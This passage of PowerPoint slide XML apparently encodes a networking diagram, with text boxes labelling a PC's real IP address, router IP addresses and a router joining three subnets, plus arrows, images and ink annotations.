            <a:off x="6056494" y="4033572"/>
            <a:ext cx="2124980" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PC/node real IP address</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="Picture 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EEA197DC-7B6A-E74B-88DA-9E2AEE1D9C95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1450613" y="5164454"/>
            <a:ext cx="5559788" cy="813331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="24" name="Straight Arrow Connector 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64B92EBA-1307-BA7C-0E96-FF2631B52148}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="16" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4900863" y="4356738"/>
            <a:ext cx="1155631" cy="1430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C950225A-7F12-AD28-6992-8209FDCB53B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6056493" y="5276454"/>
            <a:ext cx="2742601" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>router real IP address</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="TextBox 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39963A9A-58FF-2017-CBE1-F5ABC3A2944C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="5922784"/>
            <a:ext cx="2742601" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>another router with real IP address connect three subnets (groups)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="29" name="Straight Arrow Connector 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF93136E-4B73-6E7D-0408-C03100002C8A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="26" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4900863" y="5461120"/>
            <a:ext cx="1155630" cy="1099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BAB19796-2C01-3330-2A24-985237812265}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="27" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="4844716" y="5858379"/>
            <a:ext cx="1251284" cy="5260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3" name="Picture 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90E4D246-A44B-B6B8-44BF-4E16F30C01C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8603631" y="685301"/>
            <a:ext cx="3193054" cy="3994602"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="46" name="Group 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{687D8934-23AE-39BA-AE8E-5C4CC4BB929A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8879440" y="1918160"/>
            <a:ext cx="3019680" cy="4311000"/>
            <a:chOff x="8879440" y="1918160"/>
            <a:chExt cx="3019680" cy="4311000"/>
          </a:xfrm>
        </p:grpSpPr>
        <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
          <mc:Choice Requires="p14">
            <p:contentPart p14:bwMode="auto" r:id="rId6">
              <p14:nvContentPartPr>
                <p14:cNvPr id="44" name="Ink 43">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1543F0EB-D628-EBDA-9C4E-4CCA958540D7}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8879440" y="1993760"/>
                <a:ext cx="3019680" cy="4235400"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="44" name="Ink 43">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1543F0EB-D628-EBDA-9C4E-4CCA958540D7}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId7"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="8875120" y="1989440"/>
                  <a:ext cx="3028320" cy="424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Ink 44">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0698E70E-0FFD-2316-B123-3FD426C649D4}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="10464520" y="1918160"/>
                <a:ext cx="182160" cy="23040"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="45" name="Ink 44">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0698E70E-0FFD-2316-B123-3FD426C649D4}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId9"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="10460200" y="1913840"/>
                  <a:ext cx="19080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0CD4FC0C-25D0-6424-5727-21413F219BC2}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="8788360" y="3712400"/>
              <a:ext cx="1110600" cy="1733400"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="47" name="Ink 46">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CD4FC0C-25D0-6424-5727-21413F219BC2}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId11"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="8784040" y="3708080"/>
                <a:ext cx="1119240" cy="174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Ink 49">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1ADEF727-0268-0B78-3956-7CC2E233CBDC}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="9824440" y="3555440"/>
              <a:ext cx="151920" cy="273600"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="50" name="Ink 49">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1ADEF727-0268-0B78-3956-7CC2E233CBDC}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId13"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="9820120" y="3551120"/>
                <a:ext cx="160560" cy="282240"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="56" name="Group 55">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D09B4FD-94EE-F194-B409-10CB283DC9DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3342280" y="2152520"/>
            <a:ext cx="5921640" cy="1992960"/>
            <a:chOff x="3342280" y="2152520"/>
            <a:chExt cx="5921640" cy="1992960"/>
          </a:xfrm>
        </p:grpSpPr>
        <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
          <mc:Choice Requires="p14">
            <p:contentPart p14:bwMode="auto" r:id="rId14">
              <p14:nvContentPartPr>
                <p14:cNvPr id="51" name="Ink 50">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{650C1816-2B7E-9BA4-6AF1-4945714DF147}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8187880" y="3470120"/>
                <a:ext cx="1051920" cy="675360"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="51" name="Ink 50">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{650C1816-2B7E-9BA4-6AF1-4945714DF147}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId15"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="8183560" y="3465800"/>
                  <a:ext cx="106056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a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B74AC87-FC56-D190-B436-06FA4F710B70}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="9128560" y="3372560"/>
                <a:ext cx="135360" cy="218160"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="52" name="Ink 51">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B74AC87-FC56-D190-B436-06FA4F710B70}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId17"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="9124240" y="3368240"/>
                  <a:ext cx="144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k 53">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{053848FB-C558-5E97-C0AF-6AAE00EB71BD}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3342280" y="2152520"/>
                <a:ext cx="5749200" cy="1181880"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="54" name="Ink 53">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{053848FB-C558-5E97-C0AF-6AAE00EB71BD}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId19"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3337960" y="2148200"/>
                  <a:ext cx="5757840" cy="119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 name="Ink 54">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09FB8F97-C851-FC84-91B5-D83757EF9A8D}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8916880" y="3108680"/>
                <a:ext cx="206280" cy="290880"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="55" name="Ink 54">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09FB8F97-C851-FC84-91B5-D83757EF9A8D}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId21"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="8912560" y="3104360"/>
                  <a:ext cx="214920" cy="299520"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </mc:Fallback>
        </mc:AlternateContent>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="62" name="Group 61">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1BFDF89-BBA6-B33E-271D-B04A51F5D33B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1194461" y="1162598"/>
            <a:ext cx="820080" cy="1292040"/>
            <a:chOff x="1194461" y="1162598"/>
            <a:chExt cx="820080" cy="1292040"/>
          </a:xfrm>
        </p:grpSpPr>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id="{10121F61-1C8B-0EF2-BA75-5E8055850920}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1194461" y="1263398"/>
                <a:ext cx="798480" cy="1191240"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="60" name="Ink 59">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10121F61-1C8B-0EF2-BA75-5E8055850920}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId23"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="1185461" y="1254758"/>
                  <a:ext cx="816120" cy="1208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 name="Ink 60">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F007292-92A7-0F7B-3786-693D7417AE71}"/>
                    </a:ext>
                  </a:extLst>
                </p14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="1876661" y="1162598"/>
                <a:ext cx="137880" cy="270360"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="61" name="Ink 60">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F007292-92A7-0F7B-3786-693D7417AE71}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvPicPr/>
                <p:nvPr/>
              </p:nvPicPr>
              <p:blipFill>
                <a:blip r:embed="rId25"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </p:blipFill>
              <p:spPr>
                <a:xfrm>
                  <a:off x="1867661" y="1153958"/>
                  <a:ext cx="155520" cy="288000"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </mc:Fallback>
        </mc:AlternateContent>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="TextBox 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3FBB6E74-F0D7-315C-1C03-716FC83D00C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1493796"/>
            <a:ext cx="2014541" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:lumMod val="20000"/>
              <a:lumOff val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>inherited from  </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65" name="TextBox 64">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89215F5A-E418-45B7-9B46-B8A86F1EB34E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5200803" y="774558"/>
            <a:ext cx="1517880" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>consists of</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="67" name="Straight Arrow Connector 66">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{794D5702-808B-05DA-5E63-FAE0B21A557F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2671011" y="521368"/>
            <a:ext cx="3850105" cy="2005264"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">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1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B070A-27D2-3DD9-20B4-2F4CABB44293}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect b="36625"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9081971" y="0"/>
            <a:ext cx="2919747" cy="1587640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{170A578B-5F8F-DB7F-D991-854AFCCC2604}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="402056" y="1899920"/>
            <a:ext cx="11387887" cy="394258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652CFC86-1BFF-9FD2-43FE-624D2E674974}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="8415400" y="763473"/>
              <a:ext cx="2567160" cy="1512000"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="10" name="Ink 9">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{652CFC86-1BFF-9FD2-43FE-624D2E674974}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId5"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="8397760" y="745473"/>
                <a:ext cx="2602800" cy="1547640"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20D0D0E5-2127-EA4E-ED14-107B93973974}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4459705" y="2703095"/>
            <a:ext cx="2427844" cy="369332"/>
          </a:xfrm>
